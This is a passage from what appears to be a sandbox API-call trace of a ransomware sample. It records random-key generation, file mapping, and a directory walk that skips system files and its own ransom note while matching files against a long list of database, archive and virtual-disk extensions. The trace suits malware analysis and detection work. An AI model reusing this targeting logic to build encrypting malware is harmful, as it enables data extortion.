Flags=0x8, Size=0x200300) returned 0x3030020 [0064.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0064.284] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0064.284] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0064.284] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.285] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x206300, lpName=0x0) returned 0x164 [0064.286] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x6300) returned 0x190000 [0064.301] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3240000 [0064.823] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0064.826] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0064.826] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.840] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0064.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0064.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0064.840] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0064.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0064.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0064.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0064.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0064.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0064.841] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0064.847] CloseHandle (hObject=0x164) returned 1 [0064.851] CloseHandle (hObject=0x154) returned 1 [0064.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0064.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0064.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0064.862] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e9680, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64e9680, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2fec56f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="aoldtz.exe") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="..") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="windows") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="bootmgr") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="temp") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="pagefile.sys") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="boot") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ids.txt") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ntuser.dat") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="perflogs") returned 1 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="MSBuild") returned 1 [0064.862] lstrlenW (lpString="WindowsMail.pat") returned 15 [0064.862] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 97 [0064.862] lstrcpyW (in: lpString1=0x2cce48e, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0064.862] lstrlenW (lpString="WindowsMail.pat") returned 15 [0064.862] lstrlenW (lpString="Ares865") returned 7 [0064.862] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0064.862] lstrlenW (lpString=".dll") returned 4 [0064.862] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".dll") returned 1 [0064.862] lstrlenW (lpString=".lnk") returned 4 [0064.863] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".lnk") returned 1 [0064.863] lstrlenW (lpString=".ini") returned 4 [0064.863] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".ini") returned 1 [0064.863] lstrlenW (lpString=".sys") returned 4 [0064.863] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".sys") returned 1 [0064.863] lstrlenW (lpString="WindowsMail.pat") returned 15 [0064.863] lstrlenW (lpString="bak") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="bak") returned 1 [0064.863] lstrlenW (lpString="ba_") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="ba_") returned 1 [0064.863] lstrlenW (lpString="dbb") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="dbb") returned 1 [0064.863] lstrlenW (lpString="vmdk") returned 4 [0064.863] lstrcmpiW (lpString1=".pat", lpString2="vmdk") returned -1 [0064.863] lstrlenW (lpString="rar") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="rar") returned -1 [0064.863] lstrlenW (lpString="zip") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="zip") returned -1 [0064.863] lstrlenW (lpString="tgz") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="tgz") returned -1 [0064.863] lstrlenW (lpString="vbox") returned 4 [0064.863] lstrcmpiW (lpString1=".pat", lpString2="vbox") returned -1 [0064.863] lstrlenW (lpString="vdi") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="vdi") returned -1 [0064.863] lstrlenW (lpString="vhd") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="vhd") returned -1 [0064.863] lstrlenW (lpString="vhdx") returned 4 [0064.863] lstrcmpiW (lpString1=".pat", lpString2="vhdx") returned -1 [0064.863] lstrlenW (lpString="avhd") returned 4 [0064.863] lstrcmpiW (lpString1=".pat", lpString2="avhd") returned -1 [0064.863] lstrlenW (lpString="db") returned 2 [0064.863] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0064.863] lstrlenW (lpString="db2") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="db2") returned 1 [0064.863] lstrlenW (lpString="db3") returned 3 [0064.863] lstrcmpiW (lpString1="pat", lpString2="db3") returned 1 [0064.863] lstrlenW (lpString="dbf") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="dbf") returned 1 [0064.864] lstrlenW (lpString="mdf") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="mdf") returned 1 [0064.864] lstrlenW (lpString="mdb") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="mdb") returned 1 [0064.864] lstrlenW (lpString="sql") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="sql") returned -1 [0064.864] lstrlenW (lpString="sqlite") returned 6 [0064.864] lstrcmpiW (lpString1="il.pat", lpString2="sqlite") returned -1 [0064.864] lstrlenW (lpString="sqlite3") returned 7 [0064.864] lstrcmpiW (lpString1="ail.pat", lpString2="sqlite3") returned -1 [0064.864] lstrlenW (lpString="sqlitedb") returned 8 [0064.864] lstrcmpiW (lpString1="Mail.pat", lpString2="sqlitedb") returned -1 [0064.864] lstrlenW (lpString="xml") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="xml") returned -1 [0064.864] lstrlenW (lpString="$er") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="$er") returned 1 [0064.864] lstrlenW (lpString="4dd") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="4dd") returned 1 [0064.864] lstrlenW (lpString="4dl") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="4dl") returned 1 [0064.864] lstrlenW (lpString="^^^") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="^^^") returned 1 [0064.864] lstrlenW (lpString="abs") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="abs") returned 1 [0064.864] lstrlenW (lpString="abx") returned 3 [0064.864] lstrcmpiW (lpString1="pat", lpString2="abx") returned 1 [0064.864] lstrlenW (lpString="accdb") returned 5 [0064.864] lstrcmpiW (lpString1="l.pat", lpString2="accdb") returned 1 [0064.864] lstrlenW (lpString="accdc") returned 5 [0064.864] lstrcmpiW (lpString1="l.pat", lpString2="accdc") returned 1 [0064.864] lstrlenW (lpString="accde") returned 5 [0064.864] lstrcmpiW (lpString1="l.pat", lpString2="accde") returned 1 [0064.864] lstrlenW (lpString="accdr") returned 5 [0064.864] lstrcmpiW (lpString1="l.pat", lpString2="accdr") returned 1 [0064.864] lstrlenW (lpString="accdt") returned 5 [0064.864] lstrcmpiW (lpString1="l.pat", lpString2="accdt") returned 1 [0064.864] lstrlenW (lpString="accdw") returned 5 [0064.865] lstrcmpiW (lpString1="l.pat", lpString2="accdw") returned 1 [0064.865] lstrlenW (lpString="accft") returned 5 [0064.865] lstrcmpiW (lpString1="l.pat", lpString2="accft") returned 1 [0064.865] lstrlenW (lpString="adb") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0064.865] lstrlenW (lpString="adb") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0064.865] lstrlenW (lpString="ade") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="ade") returned 1 [0064.865] lstrlenW (lpString="adf") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="adf") returned 1 [0064.865] lstrlenW (lpString="adn") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="adn") returned 1 [0064.865] lstrlenW (lpString="adp") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="adp") returned 1 [0064.865] lstrlenW (lpString="alf") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="alf") returned 1 [0064.865] lstrlenW (lpString="ask") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="ask") returned 1 [0064.865] lstrlenW (lpString="btr") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="btr") returned 1 [0064.865] lstrlenW (lpString="cat") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="cat") returned 1 [0064.865] lstrlenW (lpString="cdb") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="cdb") returned 1 [0064.865] lstrlenW (lpString="ckp") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="ckp") returned 1 [0064.865] lstrlenW (lpString="cma") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="cma") returned 1 [0064.865] lstrlenW (lpString="cpd") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="cpd") returned 1 [0064.865] lstrlenW (lpString="dacpac") returned 6 [0064.865] lstrcmpiW (lpString1="il.pat", lpString2="dacpac") returned 1 [0064.865] lstrlenW (lpString="dad") returned 3 [0064.865] lstrcmpiW (lpString1="pat", lpString2="dad") returned 1 [0064.865] lstrlenW (lpString="dadiagrams") returned 10 [0064.865] lstrcmpiW (lpString1="wsMail.pat", lpString2="dadiagrams") returned 1 [0064.865] lstrlenW (lpString="daschema") returned 8 [0064.866] lstrcmpiW (lpString1="Mail.pat", lpString2="daschema") returned 1 [0064.866] lstrlenW (lpString="db-journal") returned 10 [0064.866] lstrcmpiW (lpString1="wsMail.pat", lpString2="db-journal") returned 1 [0064.866] lstrlenW (lpString="db-shm") returned 6 [0064.866] lstrcmpiW (lpString1="il.pat", lpString2="db-shm") returned 1 [0064.866] lstrlenW (lpString="db-wal") returned 6 [0064.866] lstrcmpiW (lpString1="il.pat", lpString2="db-wal") returned 1 [0064.866] lstrlenW (lpString="dbc") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dbc") returned 1 [0064.866] lstrlenW (lpString="dbs") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dbs") returned 1 [0064.866] lstrlenW (lpString="dbt") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dbt") returned 1 [0064.866] lstrlenW (lpString="dbv") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dbv") returned 1 [0064.866] lstrlenW (lpString="dbx") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dbx") returned 1 [0064.866] lstrlenW (lpString="dcb") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dcb") returned 1 [0064.866] lstrlenW (lpString="dct") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dct") returned 1 [0064.866] lstrlenW (lpString="dcx") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dcx") returned 1 [0064.866] lstrlenW (lpString="ddl") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="ddl") returned 1 [0064.866] lstrlenW (lpString="dlis") returned 4 [0064.866] lstrcmpiW (lpString1=".pat", lpString2="dlis") returned -1 [0064.866] lstrlenW (lpString="dp1") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dp1") returned 1 [0064.866] lstrlenW (lpString="dqy") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dqy") returned 1 [0064.866] lstrlenW (lpString="dsk") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dsk") returned 1 [0064.866] lstrlenW (lpString="dsn") returned 3 [0064.866] lstrcmpiW (lpString1="pat", lpString2="dsn") returned 1 [0064.866] lstrlenW (lpString="dtsx") returned 4 [0064.867] lstrcmpiW (lpString1=".pat", lpString2="dtsx") returned -1 [0064.867] lstrlenW (lpString="dxl") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="dxl") returned 1 [0064.867] lstrlenW (lpString="eco") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="eco") returned 1 [0064.867] lstrlenW (lpString="ecx") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="ecx") returned 1 [0064.867] lstrlenW (lpString="edb") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="edb") returned 1 [0064.867] lstrlenW (lpString="epim") returned 4 [0064.867] lstrcmpiW (lpString1=".pat", lpString2="epim") returned -1 [0064.867] lstrlenW (lpString="fcd") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fcd") returned 1 [0064.867] lstrlenW (lpString="fdb") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fdb") returned 1 [0064.867] lstrlenW (lpString="fic") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fic") returned 1 [0064.867] lstrlenW (lpString="flexolibrary") returned 12 [0064.867] lstrcmpiW (lpString1="dowsMail.pat", lpString2="flexolibrary") returned -1 [0064.867] lstrlenW (lpString="fm5") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fm5") returned 1 [0064.867] lstrlenW (lpString="fmp") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fmp") returned 1 [0064.867] lstrlenW (lpString="fmp12") returned 5 [0064.867] lstrcmpiW (lpString1="l.pat", lpString2="fmp12") returned 1 [0064.867] lstrlenW (lpString="fmpsl") returned 5 [0064.867] lstrcmpiW (lpString1="l.pat", lpString2="fmpsl") returned 1 [0064.867] lstrlenW (lpString="fol") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fol") returned 1 [0064.867] lstrlenW (lpString="fp3") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fp3") returned 1 [0064.867] lstrlenW (lpString="fp4") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fp4") returned 1 [0064.867] lstrlenW (lpString="fp5") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fp5") returned 1 [0064.867] lstrlenW (lpString="fp7") returned 3 [0064.867] lstrcmpiW (lpString1="pat", lpString2="fp7") returned 1 [0064.868] lstrlenW (lpString="fpt") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="fpt") returned 1 [0064.868] lstrlenW (lpString="frm") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="frm") returned 1 [0064.868] lstrlenW (lpString="gdb") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="gdb") returned 1 [0064.868] lstrlenW (lpString="gdb") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="gdb") returned 1 [0064.868] lstrlenW (lpString="grdb") returned 4 [0064.868] lstrcmpiW (lpString1=".pat", lpString2="grdb") returned -1 [0064.868] lstrlenW (lpString="gwi") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="gwi") returned 1 [0064.868] lstrlenW (lpString="hdb") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="hdb") returned 1 [0064.868] lstrlenW (lpString="his") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="his") returned 1 [0064.868] lstrlenW (lpString="ib") returned 2 [0064.868] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0064.868] lstrlenW (lpString="idb") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="idb") returned 1 [0064.868] lstrlenW (lpString="ihx") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="ihx") returned 1 [0064.868] lstrlenW (lpString="itdb") returned 4 [0064.868] lstrcmpiW (lpString1=".pat", lpString2="itdb") returned -1 [0064.868] lstrlenW (lpString="itw") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="itw") returned 1 [0064.868] lstrlenW (lpString="jet") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="jet") returned 1 [0064.868] lstrlenW (lpString="jtx") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="jtx") returned 1 [0064.868] lstrlenW (lpString="kdb") returned 3 [0064.868] lstrcmpiW (lpString1="pat", lpString2="kdb") returned 1 [0064.868] lstrlenW (lpString="kexi") returned 4 [0064.868] lstrcmpiW (lpString1=".pat", lpString2="kexi") returned -1 [0064.868] lstrlenW (lpString="kexic") returned 5 [0064.868] lstrcmpiW (lpString1="l.pat", lpString2="kexic") returned 1 [0064.868] lstrlenW (lpString="kexis") returned 5 [0064.868] lstrcmpiW (lpString1="l.pat", lpString2="kexis") returned 1 [0064.869] lstrlenW (lpString="lgc") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="lgc") returned 1 [0064.869] lstrlenW (lpString="lwx") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="lwx") returned 1 [0064.869] lstrlenW (lpString="maf") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="maf") returned 1 [0064.869] lstrlenW (lpString="maq") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="maq") returned 1 [0064.869] lstrlenW (lpString="mar") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="mar") returned 1 [0064.869] lstrlenW (lpString="marshal") returned 7 [0064.869] lstrcmpiW (lpString1="ail.pat", lpString2="marshal") returned -1 [0064.869] lstrlenW (lpString="mas") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="mas") returned 1 [0064.869] lstrlenW (lpString="mav") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="mav") returned 1 [0064.869] lstrlenW (lpString="maw") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="maw") returned 1 [0064.869] lstrlenW (lpString="mdbhtml") returned 7 [0064.869] lstrcmpiW (lpString1="ail.pat", lpString2="mdbhtml") returned -1 [0064.869] lstrlenW (lpString="mdn") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="mdn") returned 1 [0064.869] lstrlenW (lpString="mdt") returned 3 [0064.869] lstrcmpiW (lpString1="pat", lpString2="mdt") returned 1 [0064.961] lstrlenW (lpString="mfd") returned 3 [0064.961] lstrcmpiW (lpString1="pat", lpString2="mfd") returned 1 [0064.962] lstrlenW (lpString="mpd") returned 3 [0064.962] lstrcmpiW (lpString1="pat", lpString2="mpd") returned 1 [0064.963] lstrlenW (lpString="mrg") returned 3 [0064.963] lstrcmpiW (lpString1="pat", lpString2="mrg") returned 1 [0064.964] lstrlenW (lpString="mud") returned 3 [0064.964] lstrcmpiW (lpString1="pat", lpString2="mud") returned 1 [0064.965] lstrlenW (lpString="mwb") returned 3 [0064.965] lstrcmpiW (lpString1="pat", lpString2="mwb") returned 1 [0064.965] lstrlenW (lpString="myd") returned 3 [0064.965] lstrcmpiW (lpString1="pat", lpString2="myd") returned 1 [0064.965] lstrlenW (lpString="ndf") returned 3 [0064.965] lstrcmpiW (lpString1="pat", lpString2="ndf") returned 1 [0064.965] lstrlenW (lpString="nnt") returned 3 [0064.965] lstrcmpiW (lpString1="pat", lpString2="nnt") returned 1 [0064.965] lstrlenW (lpString="nrmlib") returned 6 [0064.965] lstrcmpiW (lpString1="il.pat", lpString2="nrmlib") returned -1 [0064.966] lstrlenW (lpString="ns2") returned 3 [0064.966] lstrcmpiW (lpString1="pat", lpString2="ns2") returned 1 [0064.966] lstrlenW (lpString="ns3") returned 3 [0064.966] lstrcmpiW (lpString1="pat", lpString2="ns3") returned 1 [0064.966] lstrlenW (lpString="ns4") returned 3 [0064.966] lstrcmpiW (lpString1="pat", lpString2="ns4") returned 1 [0064.966] lstrlenW (lpString="nsf") returned 3 [0064.966] lstrcmpiW (lpString1="pat", lpString2="nsf") returned 1 [0064.966] lstrlenW (lpString="nv") returned 2 [0064.966] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0064.966] lstrlenW (lpString="nv2") returned 3 [0064.967] lstrcmpiW (lpString1="pat", lpString2="nv2") returned 1 [0064.967] lstrlenW (lpString="nwdb") returned 4 [0064.967] lstrcmpiW (lpString1=".pat", lpString2="nwdb") returned -1 [0064.968] lstrlenW (lpString="nyf") returned 3 [0064.968] lstrcmpiW (lpString1="pat", lpString2="nyf") returned 1 [0064.969] lstrlenW (lpString="odb") returned 3 [0064.969] lstrcmpiW (lpString1="pat", lpString2="odb") returned 1 [0064.969] lstrlenW (lpString="odb") returned 3 [0064.969] lstrcmpiW (lpString1="pat", lpString2="odb") returned 1 [0064.969] lstrlenW (lpString="oqy") returned 3 [0064.969] lstrcmpiW (lpString1="pat", lpString2="oqy") returned 1 [0064.969] lstrlenW (lpString="ora") returned 3 [0064.969] lstrcmpiW (lpString1="pat", lpString2="ora") returned 1 [0064.969] lstrlenW (lpString="orx") returned 3 [0064.969] lstrcmpiW (lpString1="pat", lpString2="orx") returned 1 [0064.970] lstrlenW (lpString="owc") returned 3 [0064.970] lstrcmpiW (lpString1="pat", lpString2="owc") returned 1 [0064.970] lstrlenW (lpString="p96") returned 3 [0064.970] lstrcmpiW (lpString1="pat", lpString2="p96") returned 1 [0064.970] lstrlenW (lpString="p97") returned 3 [0064.970] lstrcmpiW (lpString1="pat", lpString2="p97") returned 1 [0064.970] lstrlenW (lpString="pan") returned 3 [0064.970] lstrcmpiW (lpString1="pat", lpString2="pan") returned 1 [0064.970] lstrlenW (lpString="pdb") returned 3 [0064.970] lstrcmpiW (lpString1="pat", lpString2="pdb") returned -1 [0064.971] lstrlenW (lpString="pdm") returned 3 [0064.972] lstrcmpiW (lpString1="pat", lpString2="pdm") returned -1 [0064.972] lstrlenW (lpString="pnz") returned 3 [0064.972] lstrcmpiW (lpString1="pat", lpString2="pnz") returned -1 [0064.973] lstrlenW (lpString="qry") returned 3 [0064.973] lstrcmpiW (lpString1="pat", lpString2="qry") returned -1 [0064.974] lstrlenW (lpString="qvd") returned 3 [0064.975] lstrcmpiW (lpString1="pat", lpString2="qvd") returned -1 [0064.975] lstrlenW (lpString="rbf") returned 3 [0064.976] lstrcmpiW (lpString1="pat", lpString2="rbf") returned -1 [0064.977] lstrlenW (lpString="rctd") returned 4 [0064.977] lstrcmpiW (lpString1=".pat", lpString2="rctd") returned -1 [0064.978] lstrlenW (lpString="rod") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="rod") returned -1 [0064.999] lstrlenW (lpString="rodx") returned 4 [0064.999] lstrcmpiW (lpString1=".pat", lpString2="rodx") returned -1 [0064.999] lstrlenW (lpString="rpd") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="rpd") returned -1 [0064.999] lstrlenW (lpString="rsd") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="rsd") returned -1 [0064.999] lstrlenW (lpString="sas7bdat") returned 8 [0064.999] lstrcmpiW (lpString1="Mail.pat", lpString2="sas7bdat") returned -1 [0064.999] lstrlenW (lpString="sbf") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="sbf") returned -1 [0064.999] lstrlenW (lpString="scx") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="scx") returned -1 [0064.999] lstrlenW (lpString="sdb") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="sdb") returned -1 [0064.999] lstrlenW (lpString="sdc") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="sdc") returned -1 [0064.999] lstrlenW (lpString="sdf") returned 3 [0064.999] lstrcmpiW (lpString1="pat", lpString2="sdf") returned -1 [0065.000] lstrlenW (lpString="sis") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="sis") returned -1 [0065.000] lstrlenW (lpString="spq") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="spq") returned -1 [0065.000] lstrlenW (lpString="te") returned 2 [0065.000] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0065.000] lstrlenW (lpString="teacher") returned 7 [0065.000] lstrcmpiW (lpString1="ail.pat", lpString2="teacher") returned -1 [0065.000] lstrlenW (lpString="tmd") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="tmd") returned -1 [0065.000] lstrlenW (lpString="tps") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="tps") returned -1 [0065.000] lstrlenW (lpString="trc") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="trc") returned -1 [0065.000] lstrlenW (lpString="trc") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="trc") returned -1 [0065.000] lstrlenW (lpString="trm") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="trm") returned -1 [0065.000] lstrlenW (lpString="udb") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="udb") returned -1 [0065.000] lstrlenW (lpString="udl") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="udl") returned -1 [0065.000] lstrlenW (lpString="usr") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="usr") returned -1 [0065.000] lstrlenW (lpString="v12") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="v12") returned -1 [0065.000] lstrlenW (lpString="vis") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="vis") returned -1 [0065.000] lstrlenW (lpString="vpd") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="vpd") returned -1 [0065.000] lstrlenW (lpString="vvv") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="vvv") returned -1 [0065.000] lstrlenW (lpString="wdb") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="wdb") returned -1 [0065.000] lstrlenW (lpString="wmdb") returned 4 [0065.000] lstrcmpiW (lpString1=".pat", lpString2="wmdb") returned -1 [0065.000] lstrlenW (lpString="wrk") returned 3 [0065.000] lstrcmpiW (lpString1="pat", lpString2="wrk") returned -1 [0065.001] lstrlenW (lpString="xdb") returned 3 [0065.001] lstrcmpiW (lpString1="pat", lpString2="xdb") returned -1 [0065.001] lstrlenW (lpString="xld") returned 3 [0065.001] lstrcmpiW (lpString1="pat", lpString2="xld") returned -1 [0065.001] lstrlenW 